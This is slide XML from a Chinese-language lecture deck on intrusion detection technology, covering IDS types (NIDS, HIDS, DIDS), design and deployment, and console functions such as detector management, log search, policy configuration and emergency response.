              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142358" name="TextBox 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3523" y="7063"/>
              <a:ext cx="12098" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:buBlip>
                  <a:blip r:embed="rId3"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>按入侵检测的结果做出决策判断，对入侵行为进行响应。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="630" y="7030"/>
              <a:ext cx="2293" cy="90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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="820" y="7115"/>
              <a:ext cx="1333" cy="52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solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142367" name="Text Box 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="613" y="7118"/>
              <a:ext cx="2352" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>应急处理</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0820C626-6447-431A-9000-D460A55BEA80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.3 DIDS</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7FE56C7-A938-4AC0-8C8B-98AE9D55AB45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="1620000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DE48FB-93CB-4A83-80C4-819A2E19507D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="矩形: 圆角 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075E11FA-47AF-410A-B62E-11BF604B473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7C1ACD8E-1DB0-407F-8ED0-530CC024A020}"/>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01</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0245B580-05B9-4A4A-A880-F45BF4A3B95D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 入侵检测系统概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F393E855-347F-47DC-BF7C-D072346A7DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="2520000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FBE5B2F-A33E-455C-94DC-0DD74C8598CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形: 圆角 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2BBEC0-744D-4D63-A1D7-D3EF3C0B5C6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0AFCDB31-7A42-4D30-973E-C7696D19502E}"/>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02</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FFEE7EAF-90BC-43F6-B7C2-088D4C3BCA4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原理和主要方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EFCCFF-6C07-4C65-8ED3-5FFF91FBAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="3420000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="组合 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6066EB41-F32C-45C4-99C1-0918D8C5174D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形: 圆角 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14524E7A-B812-4FB1-9D63-990CF664AB3A}"/>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86134F92-3E5A-4DE8-A8AE-9BB2DCB1B79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03</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DE2AA675-157B-45F1-8702-9486056053C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NIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>HIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>DIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF4BA50-6F79-4FE0-BB85-8085EE0839A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="4320000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0402F17D-9F88-4B2E-A2AA-6923F05BD2EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="矩形: 圆角 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650FD5F4-700F-4B0F-A2B8-16032AC000BF}"/>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8F3D8D06-0624-458B-A28D-DE6AA2A8DE2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04</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0A859A2D-CD96-4333-A77B-BDB862C2EA42}"/>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accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>设计和部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ECB501-4561-4A8B-88BE-E5161D7F9B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="5220000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242A2424-D0A6-4827-88BE-67EAB3DBF146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="矩形: 圆角 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECDEF9F-D729-4403-B8DA-D4E751BBA199}"/>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8214CB29-1AB2-4F17-9C41-BEA3D489A22A}"/>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05</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257C772-5D23-4601-A412-371CC7099EA0}"/>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发展趋势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="标题 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB32422-F32E-444F-8DBA-2CC4A9ADFB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>讲 入侵检测技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494084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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85939496-A998-9F61-9005-7A22C1533832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3043128" y="1542318"/>
            <a:ext cx="7667195" cy="863102"/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB571AC5-D242-AACB-F712-B45FF49B9576}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3437975" y="1577670"/>
            <a:ext cx="68051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indent="-342900" latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>至少包括：来源地址、目标地址、来源端口、目标端口、攻击特征、风险等级、时间段等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{582C4ABD-EE84-C835-C56D-5DEB92135CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2953434" y="2511064"/>
            <a:ext cx="7791965" cy="769797"/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{972BAF27-5790-D79A-E83B-62E8F20B2809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3458261" y="2515784"/>
            <a:ext cx="69007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indent="-342900" latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>控制台可以一次管理多个探测器，包括启动、停止、配置探测器和查看探测器运行状态等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E945603F-3FE3-3212-CBD4-E015ED1D92DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1818372" y="2509489"/>
            <a:ext cx="1455738" cy="769797"/>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61" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F38DBCE-B68B-4D87-5737-D2802EFCAC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1935847" y="2523723"/>
            <a:ext cx="833438" cy="29210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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117274DF-6254-964E-2D70-6D13C8259B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1839011" y="2628637"/>
            <a:ext cx="13922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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>探测器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00AAAE6D-81C3-DB3F-94E0-8CEBB244F8D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3050273" y="3552561"/>
            <a:ext cx="7695126" cy="795337"/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8AD6447-02D0-C6EA-FEF5-BA2739B2AFEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3458261" y="3533457"/>
            <a:ext cx="6784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Blip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>为用户提供根据不同网段具体情况配置安全策略的工具，针对不同情况制定相应安全规则</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8660DF5-2290-DB49-C311-330E7A470807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1802497" y="1537912"/>
            <a:ext cx="1455738" cy="851991"/>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67" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A05F2D-7AF2-1300-D81F-C23DABD06D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1873936" y="1557033"/>
            <a:ext cx="846137" cy="33496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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE92FC2C-48AD-A612-C1A2-0271DBED0D30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1783448" y="1747203"/>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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>日志检索</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="AutoShape 13">
            <a:extLst>
